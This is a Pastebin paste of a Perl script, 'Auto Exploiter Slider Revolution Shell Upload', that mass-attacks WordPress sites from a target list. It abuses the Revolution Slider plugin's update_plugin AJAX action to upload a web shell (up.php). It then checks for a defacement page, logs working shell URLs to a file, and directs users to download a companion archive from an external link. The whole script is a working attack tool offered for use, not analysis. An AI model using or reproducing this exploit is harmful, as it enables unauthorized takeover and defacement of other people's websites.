API tools faq
paste
amiralbenz

Auto Exploiter Slider Revolution Shell Upload

amiralbenz
Jul 11th, 2015
396
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. # exploit: Auto Exploiter Slider Revolution Shell Upload
  3. # amiralbenz
  4. # +------------------------------------------------------------------------------------------------+
  5. # | Warning : Download This Archive .zip and past in folder Bin of Perl for Use this Script !!!! |
  6. # | Link : http://www.gulfup.com/?3bDGf4 !!!! |
  7. # | |
  8. # +------------------------------------------------------------------------------------------------+
  9. #
  10. # -> Title: Auto Exploiter Slider Revolution Shell Upload
  11. # -> Author: amiral
  12. #
  13.  
  14. use LWP::UserAgent;
  15.  
  16. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  17.  
  18. head();
  19.  
  20. my $usage = " \nperl $0 <list.txt>\n perl $0 lista.txt";
  21. die "$usage" unless $ARGV[0];
  22.  
  23. open(tarrget,"<$ARGV[0]") or die "$!";
  24. while(<tarrget>){
  25. chomp($_);
  26. $target = $_;
  27.  
  28. my $path = "wp-admin/admin-ajax.php";
  29.  
  30. print "\nTarget => $target\n";
  31.  
  32. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  33. $ua->timeout(10);
  34. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  35. my $req = $ua->get("$target/$path");
  36. if($req->is_success) {
  37. print "\n [+] Xploit Possibility Work :3\n \n";
  38.  
  39.  
  40.  
  41. print " [*] Try Exploiting Vulnerability\n";
  42. print " [*] Xploiting $target\n";
  43.  
  44. my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);
  45.  
  46. print " [*] Sent payload\n";
  47.  
  48. if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
  49. print " [+] Payload successfully executed\n";
  50.  
  51. print " [*] Checking if shell was uploaded\n";
  52. my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/up.php")->content;
  53. if($check =~/<br>/) {
  54.  
  55. print " [+] Shell successfully uploaded\n";
  56. open(save, '>>Shells.txt');
  57. print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/up.php?zeb\n";
  58. close(save);
  59.  
  60.  
  61. print " [*] Checking if Deface was uploaded now\n";
  62.  
  63. my $def = $ua->get("$target/leet.html")->content;
  64. if($def = ~/Hacked/) {
  65.  
  66. print " [+] Deface uploaded successfull\n";
  67.  
  68.  
  69. } else {print " [-] Deface not Uploaded :/"; }
  70. } else { print " [-] I'think Shell Not Uploaded :/\n"; }
  71. } else {
  72. print " [-] Payload failed: Fail\n";
  73. print "\n";
  74.  
  75. }
  76. } else { print "\n [-]Xploit Fail \n"}
  77.  
  78. sub head {
  79. print "\t +===============================================\n";
  80. print "\t | Auto Exploiter Revslider Shell Upload \n";
  81. print "\t | Author: amiral\n";
  82. print "\t +===============================================\n";
  83. }
  84. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!